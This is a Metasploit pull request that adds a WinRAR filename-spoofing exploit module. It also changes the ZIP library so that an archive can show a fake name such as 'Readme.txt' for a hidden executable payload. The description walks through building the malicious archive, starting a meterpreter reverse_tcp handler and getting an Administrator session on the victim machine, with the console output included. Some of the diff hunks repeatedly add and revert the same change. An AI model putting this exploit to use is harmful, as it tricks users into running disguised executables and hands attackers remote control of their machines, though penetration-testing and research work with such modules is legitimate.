### PR TITLE
Add module for Winrar file name spoofing

### DIFF
--- a/lib/rex/zip/archive.rb
+++ b/lib/rex/zip/archive.rb
@@ -38,9 +38,11 @@ class Archive
   #
   # If fdata is set, the file is populated with that data
   # from the calling method. If fdata is nil, then the
-  # fs is checked for the file.
+  # fs is checked for the file. If central_dir_name is set
+  # it will be used to spoof the name at the Central Directory
+  # at packing time.
   #
-  def add_file(fname, fdata=nil, xtra=nil, comment=nil)
+  def add_file(fname, fdata=nil, xtra=nil, comment=nil, central_dir_name=nil)
     if (not fdata)
       begin
         st = File.stat(fname)
@@ -62,7 +64,7 @@ class Archive
       end
     end
 
-    @entries << Entry.new(fname, fdata, @compmeth, ts, attrs, xtra, comment)
+    @entries << Entry.new(fname, fdata, @compmeth, ts, attrs, xtra, comment, central_dir_name)
   end
 
 

--- a/lib/rex/zip/archive.rb
+++ b/lib/rex/zip/archive.rb
@@ -80,12 +80,11 @@ class Archive
     f.close
   end
 
+
+  #
   # Compress this archive and return the resulting zip file as a String.
   #
-  # @param spoof [Hash{String => String}] The entries whose name need to be spoofed in the Central
-  #   Directory.
-  # @return [String] The resulting zip file
-  def pack(spoof={})
+  def pack
     ret = ''
 
     # save the offests
@@ -105,7 +104,7 @@ class Archive
     idx = 0
     @entries.each { |ent|
       cfd = CentralDir.new(ent, offsets[idx])
-      ret << cfd.pack(spoof)
+      ret << cfd.pack
       idx += 1
     }
 

--- a/lib/rex/zip/archive.rb
+++ b/lib/rex/zip/archive.rb
@@ -80,11 +80,12 @@ class Archive
     f.close
   end
 
-
-  #
   # Compress this archive and return the resulting zip file as a String.
   #
-  def pack
+  # @param spoof [Hash{String => String}] The entries whose name need to be spoofed in the Central
+  #   Directory.
+  # @return [String] The resulting zip file
+  def pack(spoof={})
     ret = ''
 
     # save the offests
@@ -104,7 +105,7 @@ class Archive
     idx = 0
     @entries.each { |ent|
       cfd = CentralDir.new(ent, offsets[idx])
-      ret << cfd.pack
+      ret << cfd.pack(spoof)
       idx += 1
     }
 

--- a/lib/rex/zip/blocks.rb
+++ b/lib/rex/zip/blocks.rb
@@ -116,7 +116,11 @@ class CentralDir
   end
 
   def pack
-    path = @entry.relative_path
+    if @entry.central_dir_name.blank?
+      path = @entry.relative_path
+    else
+      path = @entry.central_dir_path
+    end
 
     ret = [ SIGNATURE, ZIP_VERSION ].pack('Vv')
     ret << [ ZIP_VERSION ].pack('v')

--- a/lib/rex/zip/blocks.rb
+++ b/lib/rex/zip/blocks.rb
@@ -115,16 +115,8 @@ class CentralDir
     @hdr_offset = offset
   end
 
-  # Creates the central directory information about the particular Zip Entry.
-  #
-  # @param spoof [Hash{String => String}] The entries whose name need to be spoofed in the Central
-  #   Directory.
-  # @return [String] The resulting zip file
-  def pack(spoof={})
+  def pack
     path = @entry.relative_path
-    if spoof.key?(path)
-      path = spoof[path]
-    end
 
     ret = [ SIGNATURE, ZIP_VERSION ].pack('Vv')
     ret << [ ZIP_VERSION ].pack('v')

--- a/lib/rex/zip/blocks.rb
+++ b/lib/rex/zip/blocks.rb
@@ -115,8 +115,16 @@ class CentralDir
     @hdr_offset = offset
   end
 
-  def pack
+  # Creates the central directory information about the particular Zip Entry.
+  #
+  # @param spoof [Hash{String => String}] The entries whose name need to be spoofed in the Central
+  #   Directory.
+  # @return [String] The resulting zip file
+  def pack(spoof={})
     path = @entry.relative_path
+    if spoof.key?(path)
+      path = spoof[path]
+    end
 
     ret = [ SIGNATURE, ZIP_VERSION ].pack('Vv')
     ret << [ ZIP_VERSION ].pack('v')

--- a/lib/rex/zip/entry.rb
+++ b/lib/rex/zip/entry.rb
@@ -8,11 +8,12 @@ module Zip
 #
 class Entry
 
-  attr_accessor :name, :flags, :info, :xtra, :comment, :attrs
+  attr_accessor :name, :flags, :info, :xtra, :comment, :attrs, :central_dir_name
   attr_reader :data
 
-  def initialize(fname, data, compmeth, timestamp=nil, attrs=nil, xtra=nil, comment=nil)
+  def initialize(fname, data, compmeth, timestamp=nil, attrs=nil, xtra=nil, comment=nil, central_dir_name=nil)
     @name = fname.unpack("C*").pack("C*")
+    @central_dir_name = (central_dir_name ? central_dir_name.unpack("C*").pack("C*") : nil)
     @data = data.unpack("C*").pack("C*")
     @xtra = xtra
     @xtra ||= ''
@@ -71,10 +72,12 @@ class Entry
 
 
   def relative_path
-    if (@name[0,1] == '/')
-      return @name[1,@name.length]
-    end
-    @name
+    get_relative_path(@name)
+  end
+
+  def central_dir_path
+    return nil if @central_dir_name.blank?
+    get_relative_path(@central_dir_name)
   end
 
 
@@ -102,6 +105,15 @@ class Entry
 
   def inspect
     "#<#{self.class} name:#{name}, data:#{@data.length} bytes>"
+  end
+
+  private
+
+  def get_relative_path(path)
+    if (path[0,1] == '/')
+      return path[1, path.length]
+    end
+    path
   end
 
 end

--- a/modules/exploits/windows/fileformat/winrar_name_spoofing.rb
+++ b/modules/exploits/windows/fileformat/winrar_name_spoofing.rb
@@ -1,0 +1,72 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WinRAR Filename Spoofing',
+      'Description'    => %q{
+        This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists
+        when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from
+        the central directory, but the file names used to extract and open contents come from the
+        Local File Header. This inconsistency allows to spoof file names when opening ZIP files
+        with WiRAR, which can be abused to execute arbitrary code, like exploited in the wild in
+        March 2014
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'chr1x', # Vulnerability discoverer according to OSVDB
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'OSVDB', '62610' ],
+          [ 'BID', '66383' ],
+          [ 'URL', 'http://securityaffairs.co/wordpress/23623/hacking/winrar-zero-day.html'],
+          [ 'URL', 'http://an7isec.blogspot.co.il/']
+        ],
+      'Platform'          => [ 'win' ],
+      'Payload'           =>
+        {
+          'DisableNops' => true,
+          'Space' => 4096
+        },
+      'Targets'        =>
+        [
+          [ 'Windows Universal', {} ]
+        ],
+      'DisclosureDate' => 'Sep 28 2009',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('SPOOF', [ true, 'The spoofed file name to show', 'Readme.txt']),
+        OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip'])
+      ], self.class)
+
+  end
+
+  def exploit
+    exe_filename = rand_text_alpha(rand(6) + 1)
+    exe_filename << ".exe"
+
+    zip = Rex::Zip::Archive.new
+    zip.add_file(exe_filename, generate_payload_exe, nil, nil, datastore['SPOOF'])
+    pack = zip.pack
+
+    print_status("Creating '#{datastore['FILENAME']}' file...")
+    file_create(pack)
+  end
+
+end


### PR DESCRIPTION
This pull requests adds a module for the WINRar file name spoofing vulnerability exploited in the wild in March 2014:

http://securityaffairs.co/wordpress/23623/hacking/winrar-zero-day.html
http://an7isec.blogspot.co.il/

It isn't indeed a new vulnerability but a very well known one.

This pull request also add suports to Rex::ZIP to spoof Entries file names in the Central Directory at packing time.
## Verification
- [x] Install a Windows machine with WinRAR 4.20 <-- I found this one vulnerable, even when there are newer versions of WinRAR around, they don't look vulnerable.
- [x] Generate a malicious ZIP file with the new module. Use the SPOOF option to customize the faked name which the user will see for the real EXE:

```
msf exploit(winrar_name_spoofing) > show options

Module options (exploit/windows/fileformat/winrar_name_spoofing):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.zip          yes       The output file name.
   SPOOF     Readme.txt       yes       The spoofed file name to show


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.172.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal


msf exploit(winrar_name_spoofing) > rexploit
[*] Reloading module...

[*] Creating 'msf.zip' file...
[+] msf.zip stored at /Users/juan/.msf4/local/msf.zip
```
- [x] Launch the handler in the console

```
msf exploit(winrar_name_spoofing) > use exploit/multi/handler 
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
```
- [x] Open the ZIP file with WinRAR in the test machine (double click). You should look something like that:

![winrar](https://cloud.githubusercontent.com/assets/1742838/2632121/46db4232-be61-11e3-9d8a-6803837618b1.png)
- [x] Double click the Readme.txt file (or the name you provided through SPOOF).
- [x] You should enjoy a new session in the handler listening in the console.

```
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769536 bytes) to 192.168.172.136
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.136:1071) at 2014-04-07 09:21:02 -0500

meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 1 closed.  Reason: User exit
```
